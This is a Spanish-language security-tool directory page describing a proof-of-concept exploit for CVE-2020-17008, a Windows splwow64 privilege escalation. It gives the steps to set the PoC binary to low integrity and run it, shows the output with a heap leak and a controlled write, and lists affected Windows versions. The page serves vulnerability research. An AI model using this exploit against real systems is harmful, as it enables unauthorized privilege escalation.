Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-17008 — Exploit de prueba de concepto para CVE-2020-17008, que demuestra la elevación de privilegios de splWOW64 mediante la manipulación del heap en Windows 10 y Server. | Kitploit
Herramientas/GitHubGitHub/jas502n/cve-2020-17008
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Binarios
GitHubjas502n/cve-2020-17008

CVE-2020-17008

Exploit de prueba de concepto para CVE-2020-17008, que demuestra la elevación de privilegios de splWOW64 mediante la manipulación del heap en Windows 10 y Server.

Ver Repositorio
4672hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-17008 splWOW64 Elevación de Privilegios

C:\Windows\splwow64.exe

Poc From:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2096

0x01 establecer splwow64_poc.exe Low

cd splwow64_poc\x64\Release

icacls splwow64_poc.exe /setintegritylevel L

root@kitploit:~
 /setintegritylevel [(CI)(OI)] nivel agrega explícitamente un ACE de integridad
         a todos los archivos coincidentes. El nivel a especificar es uno de los siguientes:
             L[ow]
             M[edium]
             H[igh]
         Las opciones de herencia del ACE de integridad pueden anteponerse al nivel, pero solo se aplican
         a directorios.

0x02 ejecutar splwow64_poc.exe

root@kitploit:~
splwow64_poc\x64\Release>splwow64_poc.exe

Start
ntdll = 0x7FF837980000
Init done
C:\Users\pwned\Desktop\splwow64_poc\x64\Release
C:\Users\pwned\Desktop\splwow64_poc\x64\Release\CreateDC.exe
Now's the time to hook up the debugger to splwow64.exe if you want to. Press [Enter] to continue . . .
Get port name
name: \RPC Control\UmpdProxy_2_bea57_0_2000
Create port.
Prepare 0x6A Message - OpenPrinter
PtrMsgReply: 0x0000000000AB0140
ClientView: 0x0000027F390B0000/0x0000000000AB0000, 0x0000027F390B0100: Microsoft XPS Document Writer
Writing message 0x6A success!
Cookie: 0x0
Preparing 0x6D message (to leak heap address) - DocumentEvent
Output: 0x0000000000000000, Heap Address: 0xFFFFFFFFFFFFFFC0
Preparing 0x6D message (write to 0x41414141) - DocumentEvent
Done

Versiones afectadas

root@kitploit:~
Windows 10 versión 1607 (para sistemas basados en x64)
Windows 10 versión 1607 para sistemas de 32 bits
Windows 10 (para sistemas basados en x64)
Windows 10 (para sistemas de 32 bits)
Windows 10 versión 1709 (para sistemas basados en ARM64)
Windows 10 versión 1709 (para sistemas basados en x64)
Windows 10 versión 1709 para sistemas de 32 bits
Windows 10 versión 1809 (para sistemas basados en ARM64)
Windows 10 versión 1809 (para sistemas basados en x64)
Windows 10 versión 1809 para sistemas de 32 bits

Windows Server, versión 1803 (instalación Server Core)
Windows 10 versión 1803 (para sistemas basados en ARM64)
Windows 10 versión 1803 (para sistemas basados en x64)
Windows 10 versión 1803 para sistemas de 32 bits

Windows Server, versión 1903 (instalación Server Core)
Windows 10 versión 1903 (para sistemas basados en ARM64)
Windows 10 versión 1903 (para sistemas basados en x64)
Windows 10 versión 1903 para sistemas de 32 bits

Windows Server, versión 1909 (instalación Server Core)
Windows 10 versión 1909 (para sistemas basados en ARM64)
Windows 10 versión 1909 (para sistemas basados en x64)
Windows 10 versión 1909 para sistemas de 32 bits

Windows Server, versión 2004 (instalación Server Core)
Windows 10 versión 2004 (para sistemas basados en x64)
Windows 10 versión 2004 (para sistemas basados en ARM64)
Windows 10 versión 2004 para sistemas de 32 bits

Windows Server 2016 (instalación Server Core)
Windows Server 2016

Windows Server 2019 (instalación Server Core)
Windows Server 2019

Windows Server 2012
Windows Server 2012 R2 (instalación Server Core)
Windows Server 2012 R2
Windows Server 2012 (instalación Server Core)

Windows RT 8.1
Windows 8.1 (para sistemas basados en x64)
Windows 8.1 (para sistemas de 32 bits)
Descargar herramienta